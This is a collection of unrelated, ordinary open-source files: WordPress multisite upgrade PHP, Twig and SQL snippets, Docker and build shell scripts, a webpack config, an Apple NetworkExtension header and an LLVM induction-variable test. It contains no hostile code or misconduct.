REG_ESP_INDEX, REG_EBP_INDEX, REG_EIP_INDEX, REG_FLAGS_INDEX,
REG_DWORD_OFFSET, REG_SEG_OFFSET, REG_FPU_OFFSET,
opt_none
};
| {
"pile_set_name": "Github"
} |
<?php
/**
* Multisite upgrade administration panel.
*
* @package WordPress
* @subpackage Multisite
* @since 3.0.0
*/
/** Load WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';
require_once ABSPATH . WPINC . '/http.php';
$title = __( 'Upgrade Network' );
$parent_file = 'upgrade.php';
get_current_screen()->add_help_tab(
array(
'id' => 'overview',
'title' => __( 'Overview' ),
'content' =>
'<p>' . __( 'Only use this screen once you have updated to a new version of WordPress through Updates/Available Updates (via the Network Administration navigation menu or the Toolbar). Clicking the Upgrade Network button will step through each site in the network, five at a time, and make sure any database updates are applied.' ) . '</p>' .
'<p>' . __( 'If a version update to core has not happened, clicking this button won’t affect anything.' ) . '</p>' .
'<p>' . __( 'If this process fails for any reason, users logging in to their sites will force the same update.' ) . '</p>',
)
);
get_current_screen()->set_help_sidebar(
'<p><strong>' . __( 'For more information:' ) . '</strong></p>' .
'<p>' . __( '<a href="https://wordpress.org/support/article/network-admin-updates-screen/">Documentation on Upgrade Network</a>' ) . '</p>' .
'<p>' . __( '<a href="https://wordpress.org/support/">Support</a>' ) . '</p>'
);
require_once ABSPATH . 'wp-admin/admin-header.php';
if ( ! current_user_can( 'upgrade_network' ) ) {
wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 );
}
echo '<div class="wrap">';
echo '<h1>' . __( 'Upgrade Network' ) . '</h1>';
$action = isset( $_GET['action'] ) ? $_GET['action'] : 'show';
switch ( $action ) {
case 'upgrade':
$n = ( isset( $_GET['n'] ) ) ? intval( $_GET['n'] ) : 0;
if ( $n < 5 ) {
/**
* @global int $wp_db_version WordPress database version.
*/
global $wp_db_version;
update_site_option( 'wpmu_upgrade_site', $wp_db_version );
}
$site_ids = get_sites(
array(
'spam' => 0,
'deleted' => 0,
'archived' => 0,
'network_id' => get_current_network_id(),
'number' => 5,
'offset' => $n,
'fields' => 'ids',
'order' => 'DESC',
'orderby' => 'id',
'update_site_meta_cache' => false,
)
);
if ( empty( $site_ids ) ) {
echo '<p>' . __( 'All done!' ) . '</p>';
break;
}
echo '<ul>';
foreach ( (array) $site_ids as $site_id ) {
switch_to_blog( $site_id );
$siteurl = site_url();
$upgrade_url = admin_url( 'upgrade.php?step=upgrade_db' );
restore_current_blog();
echo "<li>$siteurl</li>";
$response = wp_remote_get(
$upgrade_url,
array(
'timeout' => 120,
'httpversion' => '1.1',
'sslverify' => false,
)
);
if ( is_wp_error( $response ) ) {
wp_die(
sprintf(
/* translators: 1: Site URL, 2: Server error message. */
__( 'Warning! Problem updating %1$s. Your server may not be able to connect to sites running on it. Error message: %2$s' ),
$siteurl,
'<em>' . $response->get_error_message() . '</em>'
)
);
}
/**
* Fires after the Multisite DB upgrade for each site is complete.
*
* @since MU (3.0.0)
*
* @param array|WP_Error $response The upgrade response array or WP_Error on failure.
*/
do_action( 'after_mu_upgrade', $response );
/**
* Fires after each site has been upgraded.
*
* @since MU (3.0.0)
*
* @param int $site_id The Site ID.
*/
do_action( 'wpmu_upgrade_site', $site_id );
}
echo '</ul>';
?><p><?php _e( 'If your browser doesn’t start loading the next page automatically, click this link:' ); ?> <a class="button" href="upgrade.php?action=upgrade&n=<?php echo ( $n + 5 ); ?>"><?php _e( 'Next Sites' ); ?></a></p>
<script type="text/javascript">
<!--
function nextpage() {
location.href = "upgrade.php?action=upgrade&n=<?php echo ( $n + 5 ); ?>";
}
setTimeout( "nextpage()", 250 );
//-->
</script>
<?php
break;
case 'show':
default:
if ( (int) get_site_option( 'wpmu_upgrade_site' ) !== $GLOBALS['wp_db_version'] ) :
?>
<h2><?php _e( 'Database Update Required' ); ?></h2>
<p><?php _e( 'WordPress has been updated! Before we send you on your way, we need to individually upgrade the sites in your network.' ); ?></p>
<?php endif; ?>
<p><?php _e( 'The database update process may take a little while, so please be patient.' ); ?></p>
<p><a class="button button-primary" href="upgrade.php?action=upgrade"><?php _e( 'Upgrade Network' ); ?></a></p>
<?php
/**
* Fires before the footer on the network upgrade screen.
*
* @since MU (3.0.0)
*/
do_action( 'wpmu_upgrade_page' );
break;
}
?>
</div>
<?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?>
| {
"pile_set_name": "Github"
} |
{% if myFriends|default(null) %}
<div class="topic-num">
<div class="page-header">{{'thread.other_event.my_friends'|trans}}</div>
<div class="num-list">
{% include 'thread/event/user-grids-li.html.twig' with {members:myFriends} %}
</div>
</div>
{% endif %}
{% if members|default(null) %}
<div class="topic-num" id="event-member" data-sum="{{ membersCount|default(0) }}">
<div class="page-header">{{'thread.other_event.my_friends.newest_member'|trans({'%membersCount%':membersCount|default(0)})}}</div>
<div class="num-list js-join-members">
{% include 'thread/event/user-grids-li.html.twig' %}
</div>
<div class="num-more">
{% if membersCount|default(0) > 16 %}
{% do script(['app/js/thread/event-member/index.js']) %}
<span class="glyphicon glyphicon-chevron-down js-members-expand" style="cursor: pointer;" data-url="{{ path('ajax_thread_member_show', {threadId:threadId}) }}"></span>
<span class="glyphicon glyphicon-chevron-up js-members-collapse" style="cursor: pointer; display:none"></span>
{% endif %}
</div>
</div>
{% endif %}
| {
"pile_set_name": "Github"
} |
-- Show the complete text for page 11 in the book 'Legacy of the Aspects'
UPDATE `page_text` SET `NextPageID` = 466 WHERE `NextPageID` = 459 AND `ID` = 458;
| {
"pile_set_name": "Github"
} |
package com.alibaba.json.bvt.issue_2200.issue2224_5;
import com.alibaba.json.bvt.issue_2200.issue2224.KeyedCollection;
abstract class MA2GroupedCollection<TKey, TItem> extends KeyedCollection<TKey, TItem[]> {
}
| {
"pile_set_name": "Github"
} |
#!/bin/sh
set -e
# first arg is `-f` or `--some-option`
# or first arg is `something.toml`
if [ "${1#-}" != "$1" ] || [ "${1%.toml}" != "$1" ]; then
set -- /bin/ledis-server "$@"
fi
# allow the container to be started with `--user`
if [ "$1" = 'ledis-server' -a "$(id -u)" = '0' ]; then
chown -R ledis /datastore
chown ledis:ledis /bin/ledis-*
exec gosu ledis "$0" "$@"
fi
exec "$@" | {
"pile_set_name": "Github"
} |
var $path = require("path");
module.exports = {
mode: "production",
devtool: "source-map",
entry: {
index: ["core-js/stable", "./index.js"]
},
output: {
path: $path.join(__dirname, "dist"),
publicPath: "dist/",
filename: "[name].js",
chunkFilename: "[name].js"
},
module: {
rules: [{
test: /.js$/,
include: /node_modules/,
use: {
loader: "babel-loader",
options: {
presets: ["@babel/preset-env"],
plugins: ["@babel/plugin-syntax-dynamic-import"]
}
}
}, {
test: /.js$/,
use: ["source-map-loader"],
enforce: "pre"
}]
}
}; | {
"pile_set_name": "Github"
} |
// Copyright ©2017 The Gonum Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package ordered provides common sort ordering types.
package ordered // import "gonum.org/v1/gonum/graph/internal/ordered"
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# Copyright 2017 Johns Hopkins University (Shinji Watanabe)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
echo "$0 $*" >&2 # Print the command line for logging
. ./path.sh
nj=1
cmd=run.pl
nlsyms=""
lang=""
feat="" # feat.scp
oov="<unk>"
bpecode=""
allow_one_column=false
verbose=0
trans_type=char
filetype=""
preprocess_conf=""
category=""
out="" # If omitted, write in stdout
text=""
multilingual=false
help_message=$(cat << EOF
Usage: $0 <data-dir> <dict>
e.g. $0 data/train data/lang_1char/train_units.txt
Options:
--nj <nj> # number of parallel jobs
--cmd (utils/run.pl|utils/queue.pl <queue opts>) # how to run jobs.
--feat <feat-scp> # feat.scp or feat1.scp,feat2.scp,...
--oov <oov-word> # Default: <unk>
--out <outputfile> # If omitted, write in stdout
--filetype <mat|hdf5|sound.hdf5> # Specify the format of feats file
--preprocess-conf <json> # Apply preprocess to feats when creating shape.scp
--verbose <num> # Default: 0
EOF
)
. utils/parse_options.sh
if [ $# != 2 ]; then
echo "${help_message}" 1>&2
exit 1;
fi
set -euo pipefail
dir=$1
dic=$2
tmpdir=$(mktemp -d ${dir}/tmp-XXXXX)
trap 'rm -rf ${tmpdir}' EXIT
if [ -z ${text} ]; then
text=${dir}/text
fi
# 1. Create scp files for inputs
# These are not necessary for decoding mode, and make it as an option
input=
if [ -n "${feat}" ]; then
_feat_scps=$(echo "${feat}" | tr ',' ' ' )
read -r -a feat_scps <<< $_feat_scps
num_feats=${#feat_scps[@]}
for (( i=1; i<=num_feats; i++ )); do
feat=${feat_scps[$((i-1))]}
mkdir -p ${tmpdir}/input_${i}
input+="input_${i} "
cat ${feat} > ${tmpdir}/input_${i}/feat.scp
# Dump in the "legacy" style JSON format
if [ -n "${filetype}" ]; then
awk -v filetype=${filetype} '{print $1 " " filetype}' ${feat} \
> ${tmpdir}/input_${i}/filetype.scp
fi
feat_to_shape.sh --cmd "${cmd}" --nj ${nj} \
--filetype "${filetype}" \
--preprocess-conf "${preprocess_conf}" \
--verbose ${verbose} ${feat} ${tmpdir}/input_${i}/shape.scp
done
fi
# 2. Create scp files for outputs
mkdir -p ${tmpdir}/output
if [ -n "${bpecode}" ]; then
if [ ${multilingual} = true ]; then
# remove a space before the language ID
paste -d " " <(awk '{print $1}' ${text}) <(cut -f 2- -d" " ${text} \
| spm_encode --model=${bpecode} --output_format=piece | cut -f 2- -d" ") \
> ${tmpdir}/output/token.scp
else
paste -d " " <(awk '{print $1}' ${text}) <(cut -f 2- -d" " ${text} \
| spm_encode --model=${bpecode} --output_format=piece) \
> ${tmpdir}/output/token.scp
fi
elif [ -n "${nlsyms}" ]; then
text2token.py -s 1 -n 1 -l ${nlsyms} ${text} --trans_type ${trans_type} > ${tmpdir}/output/token.scp
else
text2token.py -s 1 -n 1 ${text} --trans_type ${trans_type} > ${tmpdir}/output/token.scp
fi
< ${tmpdir}/output/token.scp utils/sym2int.pl --map-oov ${oov} -f 2- ${dic} > ${tmpdir}/output/tokenid.scp
# +2 comes from CTC blank and EOS
vocsize=$(tail -n 1 ${dic} | awk '{print $2}')
odim=$(echo "$vocsize + 2" | bc)
< ${tmpdir}/output/tokenid.scp awk -v odim=${odim} '{print $1 " " NF-1 "," odim}' > ${tmpdir}/output/shape.scp
cat ${text} > ${tmpdir}/output/text.scp
# 3. Create scp files for the others
mkdir -p ${tmpdir}/other
if [ ${multilingual} == true ]; then
awk '{
n = split($1,S,"[-]");
lang=S[n];
print $1 " " lang
}' ${text} > ${tmpdir}/other/lang.scp
elif [ -n "${lang}" ]; then
awk -v lang=${lang} '{print $1 " " lang}' ${text} > ${tmpdir}/other/lang.scp
fi
if [ -n "${category}" ]; then
awk -v category=${category} '{print $1 " " category}' ${dir}/text \
> ${tmpdir}/other/category.scp
fi
cat ${dir}/utt2spk > ${tmpdir}/other/utt2spk.scp
# 4. Merge scp files into a JSON file
opts=""
if [ -n "${feat}" ]; then
intypes="${input} output other"
else
intypes="output other"
fi
for intype in ${intypes}; do
if [ -z "$(find "${tmpdir}/${intype}" -name "*.scp")" ]; then
continue
fi
if [ ${intype} != other ]; then
opts+="--${intype%_*}-scps "
else
opts+="--scps "
fi
for x in "${tmpdir}/${intype}"/*.scp; do
k=$(basename ${x} .scp)
if [ ${k} = shape ]; then
opts+="shape:${x}:shape "
else
opts+="${k}:${x} "
fi
done
done
if ${allow_one_column}; then
opts+="--allow-one-column true "
else
opts+="--allow-one-column false "
fi
if [ -n "${out}" ]; then
opts+="-O ${out}"
fi
merge_scp2json.py --verbose ${verbose} ${opts}
rm -fr ${tmpdir}
| {
"pile_set_name": "Github"
} |
{
"name": "JOHNSON WOOLEN MILLS",
"displayName": "JOHNSON WOOLEN MILLS",
"properties": [
"johnsonwoolenmills.com"
]
} | {
"pile_set_name": "Github"
} |
#!/bin/bash -e
here=$(readlink -f $(dirname "$0"))
cd "${here}"
# clean up any remnants from the previous build
rm -rf pi-gen
docker rm -v pigen_work >/dev/null 2>&1 || true
compgen -G "gateway*" >/dev/null && rm -rf gateway* || true
compgen -G "node_modules*" >/dev/null && rm -rf node_modules* || true
# copy the gateway source
_temp=$(mktemp -d)
cp -a "${here}/.." "${_temp}"
# get a fresh copy of pi-gen
git clone https://github.com/RPi-Distro/pi-gen.git
# replace stage3 and add our config and the gateway source
rm -rf pi-gen/stage3
cp -r config stage3 pi-gen
mkdir pi-gen/stage3/03-add-gateway/files
mv "${_temp}" pi-gen/stage3/03-add-gateway/files/gateway
rm -rf pi-gen/stage3/03-add-gateway/files/gateway/{.git,image,node_modules}
cd pi-gen
# fix 32-/64-bit issue: https://github.com/RPi-Distro/pi-gen/issues/271
if sed --version 2>&1 | grep -q GNU; then
sed -i 's_FROM debian:buster_FROM i386/debian:buster_' Dockerfile
else
sed -i '' 's_FROM debian:buster_FROM i386/debian:buster_' Dockerfile
fi
# skip stage4 and stage5
touch ./stage4/SKIP ./stage5/SKIP
touch ./stage2/SKIP_IMAGES ./stage4/SKIP_IMAGES ./stage5/SKIP_IMAGES
# build it
PRESERVE_CONTAINER=1 ./build-docker.sh
cd "${here}"
# rename the image
_version="$(node -e "console.log(require('../package.json').version)")"
_image_name=$(basename $(ls -1 pi-gen/deploy/*.zip))
_image_name=${_image_name/image_/}
_image_name=${_image_name/.zip/}
mv pi-gen/deploy/*.zip "gateway-${_version}.img.zip"
shasum --algorithm 256 "gateway-${_version}.img.zip" > "gateway-${_version}.img.zip.sha256sum"
# copy the built gateway out of the docker image
docker cp "pigen_work:/pi-gen/work/${_image_name}/stage3/rootfs/home/pi/mozilla-iot/gateway" .
makeContentAddressedArchive() {
base_name="$1"
digest=$(openssl dgst -sha256 "${base_name}.tar.gz" | awk '{print $2}')
mv "${base_name}.tar.gz" "${base_name}-${digest}.tar.gz"
}
# generate the OTA release files
mv gateway/node_modules node_modules
tar czf gateway.tar.gz gateway
tar czf node_modules.tar.gz node_modules
makeContentAddressedArchive node_modules
makeContentAddressedArchive gateway
# clean up
rm -rf gateway node_modules pi-gen
docker rm -v pigen_work
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2015, 2017 Apple Inc.
* All rights reserved.
*/
#ifndef __NE_INDIRECT__
#error "Please import the NetworkExtension module instead of this file directly."
#endif
NS_ASSUME_NONNULL_BEGIN
/*!
* @file NEAppProxyFlow.h
* @discussion This file declares the NEAppProxyFlow API. The NEAppProxyFlow API is used to interact with various streams of network data in the context of NEProvider implementations.
*/
@class NWHostEndpoint;
@class NEFlowMetaData;
#if defined(__cplusplus)
#define NEAPPPROXYFLOW_EXPORT extern "C"
#else
#define NEAPPPROXYFLOW_EXPORT extern
#endif
/*!
* @typedef NEAppProxyFlowError
* @abstract Flow error codes
*/
typedef NS_ENUM(NSInteger, NEAppProxyFlowError) {
/*! @const NEAppProxyFlowErrorNotOpen The flow is not fully open. */
NEAppProxyFlowErrorNotConnected = 1,
/*! @const NEAppProxyFlowErrorPeerReset The remote peer reset the flow. */
NEAppProxyFlowErrorPeerReset = 2,
/*! @const NEAppProxyFlowErrorHostUnreachable The remote peer is unreachable. */
NEAppProxyFlowErrorHostUnreachable = 3,
/*! @const NEAppProxyFlowErrorInvalidArgument An invalid argument was passed to one of the NEAppProxyFlow methods. */
NEAppProxyFlowErrorInvalidArgument = 4,
/*! @const NEAppProxyFlowErrorAborted The flow was aborted. */
NEAppProxyFlowErrorAborted = 5,
/*! @const NEAppProxyFlowErrorRefused The flow was disallowed. */
NEAppProxyFlowErrorRefused = 6,
/*! @const NEAppProxyFlowErrorTimedOut The flow timed out. */
NEAppProxyFlowErrorTimedOut = 7,
/*! @const NEAppProxyFlowErrorInternal An internal error occurred. */
NEAppProxyFlowErrorInternal = 8,
/*! @const NEAppProxyFlowErrorDatagramTooLarge An attempt was made to write a datagram that is larger than the socket's receive window */
NEAppProxyFlowErrorDatagramTooLarge NS_AVAILABLE(10_11, 9_3) = 9,
/*! @const NEAppProxyFlowErrorReadAlreadyPending A read operation on the flow is already pending */
NEAppProxyFlowErrorReadAlreadyPending NS_AVAILABLE(10_11, 9_3) = 10,
} NS_ENUM_AVAILABLE(10_11, 9_0);
/*! @const NEAppProxyErrorDomain The NEAppProxyFlow error domain */
NEAPPPROXYFLOW_EXPORT NSString * const NEAppProxyErrorDomain NS_AVAILABLE(10_11, 9_0);
/*!
* @interface NEAppProxyFlow
* @discussion The NEAppProxyFlow class is an abstract base class that declares the programmatic interface for a flow of network data.
*
* NEAppProxyFlow is part of NetworkExtension.framework.
*
* Instances of this class are thread safe.
*/
NS_CLASS_AVAILABLE(10_11, 9_0)
@interface NEAppProxyFlow : NSObject
/*!
* @method openWithLocalEndpoint:completionHandler:
* @discussion This function is used by an NEProvider implementation to indicate that it is ready to handle flow data.
* @param localEndpoint The address and port that should be used as the local endpoint of the socket associated with this flow. If the source application already specifed a local endpoint by binding the socket then this parameter is ignored.
* @param completionHandler A block that is called when the process of opening flow is complete. A nil value passed to this block indicates that the flow was opened successfully. A non-nil NSError value indicates that the flow failed to open successfully.
*/
- (void)openWithLocalEndpoint:(nullable NWHostEndpoint *)localEndpoint completionHandler:(void (^)(NSError *__nullable error))completionHandler NS_AVAILABLE(10_11, 9_0);
/*!
* @method closeReadWithError:
* @discussion This function is used by an NEProvider implementation to indicate that it does not want to receive any more data from the flow.
* @param error An error in NEAppProxyErrorDomain that should be passed to the flow's source application.
*/
- (void)closeReadWithError:(nullable NSError *)error NS_AVAILABLE(10_11, 9_0);
/*!
* @method closeWriteWithError:
* @discussion This functions is used by an NEProvider implementation to indicate that it does not have any more data to write to the flow.
* @param error An error in NEAppProxyErrorDomain that should be passed to the flow's source application.
*/
- (void)closeWriteWithError:(nullable NSError *)error NS_AVAILABLE(10_11, 9_0);
/*!
* @property metaData
* @discussion An NEFlowMetaData object containing meta data for the flow.
*/
@property (readonly) NEFlowMetaData *metaData NS_AVAILABLE(10_11, 9_0);
@end
NS_ASSUME_NONNULL_END
| {
"pile_set_name": "Github"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt < %s -indvars -S | FileCheck %s
target datalayout = "e-m:e-i64:64-p:64:64:64-n8:16:32:64-S128"
; When widening IV and its users, trunc and zext/sext are not needed
; if the original 32-bit user is known to be non-negative, whether
; the IV is considered signed or unsigned.
define void @foo(i32* %A, i32* %B, i32* %C, i32 %N) {
; CHECK-LABEL: @foo(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[CMP1:%.*]] = icmp slt i32 0, [[N:%.*]]
; CHECK-NEXT: br i1 [[CMP1]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_END:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[N]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_INC:%.*]] ], [ 0, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[ARRAYIDX:%.*]] = getelementptr inbounds i32, i32* [[B:%.*]], i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP0:%.*]] = load i32, i32* [[ARRAYIDX]], align 4
; CHECK-NEXT: [[TMP1:%.*]] = add nuw nsw i64 [[INDVARS_IV]], 2
; CHECK-NEXT: [[ARRAYIDX2:%.*]] = getelementptr inbounds i32, i32* [[C:%.*]], i64 [[TMP1]]
; CHECK-NEXT: [[TMP2:%.*]] = load i32, i32* [[ARRAYIDX2]], align 4
; CHECK-NEXT: [[ADD3:%.*]] = add nsw i32 [[TMP0]], [[TMP2]]
; CHECK-NEXT: [[TMP3:%.*]] = trunc i64 [[TMP1]] to i32
; CHECK-NEXT: [[DIV0:%.*]] = udiv i32 5, [[TMP3]]
; CHECK-NEXT: [[ADD4:%.*]] = add nsw i32 [[ADD3]], [[DIV0]]
; CHECK-NEXT: [[ARRAYIDX5:%.*]] = getelementptr inbounds i32, i32* [[A:%.*]], i64 [[INDVARS_IV]]
; CHECK-NEXT: store i32 [[ADD4]], i32* [[ARRAYIDX5]], align 4
; CHECK-NEXT: br label [[FOR_INC]]
; CHECK: for.inc:
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_FOR_END_CRIT_EDGE:%.*]]
; CHECK: for.cond.for.end_crit_edge:
; CHECK-NEXT: br label [[FOR_END]]
; CHECK: for.end:
; CHECK-NEXT: ret void
;
entry:
%cmp1 = icmp slt i32 0, %N
br i1 %cmp1, label %for.body.lr.ph, label %for.end
for.body.lr.ph: ; preds = %entry
br label %for.body
for.body: ; preds = %for.body.lr.ph, %for.inc
%i.02 = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.inc ]
%idxprom = sext i32 %i.02 to i64
%arrayidx = getelementptr inbounds i32, i32* %B, i64 %idxprom
%0 = load i32, i32* %arrayidx, align 4
%add = add nsw i32 %i.02, 2
%idxprom1 = zext i32 %add to i64
%arrayidx2 = getelementptr inbounds i32, i32* %C, i64 %idxprom1
%1 = load i32, i32* %arrayidx2, align 4
%add3 = add nsw i32 %0, %1
%div0 = udiv i32 5, %add
%add4 = add nsw i32 %add3, %div0
%idxprom4 = zext i32 %i.02 to i64
%arrayidx5 = getelementptr inbounds i32, i32* %A, i64 %idxprom4
store i32 %add4, i32* %arrayidx5, align 4
br label %for.inc
for.inc: ; preds = %for.body
%inc = add nsw i32 %i.02, 1
%cmp = icmp slt i32 %inc, %N
br i1 %cmp, label %for.body, label %for.cond.for.end_crit_edge
for.cond.for.end_crit_edge: ; preds = %for.inc
br label %for.end
for.end: ; preds = %for.cond.for.end_crit_edge, %entry
ret void
}
define void @foo1(i32* %A, i32* %B, i32* %C, i32 %N) {
; CHECK-LABEL: @foo1(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[CMP1:%.*]] = icmp slt i32 0, [[N:%.*]]
; CHECK-NEXT: br i1 [[CMP1]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_END:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[N]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_INC:%.*]] ], [ 0, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[ARRAYIDX:%.*]] = getelementptr inbounds i32, i32* [[B:%.*]], i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP0:%.*]] = load i32, i32* [[ARRAYIDX]], align 4
; CHECK-NEXT: [[TMP1:%.*]] = add nuw nsw i64 [[INDVARS_IV]], 2
; CHECK-NEXT: [[ARRAYIDX2:%.*]] = getelementptr inbounds i32, i32* [[C:%.*]], i64 [[TMP1]]
; CHECK-NEXT: [[TMP2:%.*]] = load i32, i32* [[ARRAYIDX2]], align 4
; CHECK-NEXT: [[ADD3:%.*]] = add nsw i32 [[TMP0]], [[TMP2]]
; CHECK-NEXT: [[ARRAYIDX5:%.*]] = getelementptr inbounds i32, i32* [[A:%.*]], i64 [[INDVARS_IV]]
; CHECK-NEXT: store i32 [[ADD3]], i32* [[ARRAYIDX5]], align 4
; CHECK-NEXT: br label [[FOR_INC]]
; CHECK: for.inc:
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_FOR_END_CRIT_EDGE:%.*]]
; CHECK: for.cond.for.end_crit_edge:
; CHECK-NEXT: br label [[FOR_END]]
; CHECK: for.end:
; CHECK-NEXT: ret void
;
entry:
%cmp1 = icmp slt i32 0, %N
br i1 %cmp1, label %for.body.lr.ph, label %for.end
for.body.lr.ph: ; preds = %entry
br label %for.body
for.body: ; preds = %for.body.lr.ph, %for.inc
%i.02 = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.inc ]
%idxprom = zext i32 %i.02 to i64
%arrayidx = getelementptr inbounds i32, i32* %B, i64 %idxprom
%0 = load i32, i32* %arrayidx, align 4
%add = add nsw i32 %i.02, 2
%idxprom1 = sext i32 %add to i64
%arrayidx2 = getelementptr inbounds i32, i32* %C, i64 %idxprom1
%1 = load i32, i32* %arrayidx2, align 4
%add3 = add nsw i32 %0, %1
%idxprom4 = sext i32 %i.02 to i64
%arrayidx5 = getelementptr inbounds i32, i32* %A, i64 %idxprom4
store i32 %add3, i32* %arrayidx5, align 4
br label %for.inc
for.inc: ; preds = %for.body
%inc = add nsw i32 %i.02, 1
%cmp = icmp slt i32 %inc, %N
br i1 %cmp, label %for.body, label %for.cond.for.end_crit_edge
for.cond.for.end_crit_edge: ; preds = %for.inc
br label %for.end
for.end: ; preds = %for.cond.for.end_crit_edge, %entry
ret void
}
@a = common global [100 x i32] zeroinitializer, align 16
@b = common global [100 x i32] zeroinitializer, align 16
define i32 @foo2(i32 %M) {
; CHECK-LABEL: @foo2(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[CMP1:%.*]] = icmp slt i32 0, [[M:%.*]]
; CHECK-NEXT: br i1 [[CMP1]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_END:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[TMP0:%.*]] = sext i32 [[M]] to i64
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[M]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_INC:%.*]] ], [ 0, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[ARRAYIDX:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP1:%.*]] = load i32, i32* [[ARRAYIDX]], align 4
; CHECK-NEXT: [[ARRAYIDX2:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @b, i64 0, i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP2:%.*]] = load i32, i32* [[ARRAYIDX2]], align 4
; CHECK-NEXT: [[ADD:%.*]] = add nsw i32 [[TMP1]], [[TMP2]]
; CHECK-NEXT: [[TMP3:%.*]] = add nsw i64 [[INDVARS_IV]], [[TMP0]]
; CHECK-NEXT: [[ARRAYIDX5:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 [[TMP3]]
; CHECK-NEXT: store i32 [[ADD]], i32* [[ARRAYIDX5]], align 4
; CHECK-NEXT: br label [[FOR_INC]]
; CHECK: for.inc:
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_FOR_END_CRIT_EDGE:%.*]]
; CHECK: for.cond.for.end_crit_edge:
; CHECK-NEXT: br label [[FOR_END]]
; CHECK: for.end:
; CHECK-NEXT: [[CALL:%.*]] = call i32 @dummy(i32* getelementptr inbounds ([100 x i32], [100 x i32]* @a, i32 0, i32 0), i32* getelementptr inbounds ([100 x i32], [100 x i32]* @b, i32 0, i32 0))
; CHECK-NEXT: ret i32 0
;
entry:
%cmp1 = icmp slt i32 0, %M
br i1 %cmp1, label %for.body.lr.ph, label %for.end
for.body.lr.ph: ; preds = %entry
br label %for.body
for.body: ; preds = %for.body.lr.ph, %for.inc
%i.02 = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.inc ]
%idxprom = zext i32 %i.02 to i64
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 %idxprom
%0 = load i32, i32* %arrayidx, align 4
%idxprom1 = sext i32 %i.02 to i64
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* @b, i64 0, i64 %idxprom1
%1 = load i32, i32* %arrayidx2, align 4
%add = add nsw i32 %0, %1
%add3 = add nsw i32 %i.02, %M
%idxprom4 = sext i32 %add3 to i64
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 %idxprom4
store i32 %add, i32* %arrayidx5, align 4
br label %for.inc
for.inc: ; preds = %for.body
%inc = add nsw i32 %i.02, 1
%cmp = icmp slt i32 %inc, %M
br i1 %cmp, label %for.body, label %for.cond.for.end_crit_edge
for.cond.for.end_crit_edge: ; preds = %for.inc
br label %for.end
for.end: ; preds = %for.cond.for.end_crit_edge, %entry
%call = call i32 @dummy(i32* getelementptr inbounds ([100 x i32], [100 x i32]* @a, i32 0, i32 0), i32* getelementptr inbounds ([100 x i32], [100 x i32]* @b, i32 0, i32 0))
ret i32 0
}
declare i32 @dummy(i32*, i32*)
; A case where zext should not be eliminated when its operands could only be extended by sext.
define i32 @foo3(i32 %M) {
; CHECK-LABEL: @foo3(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[CMP1:%.*]] = icmp slt i32 0, [[M:%.*]]
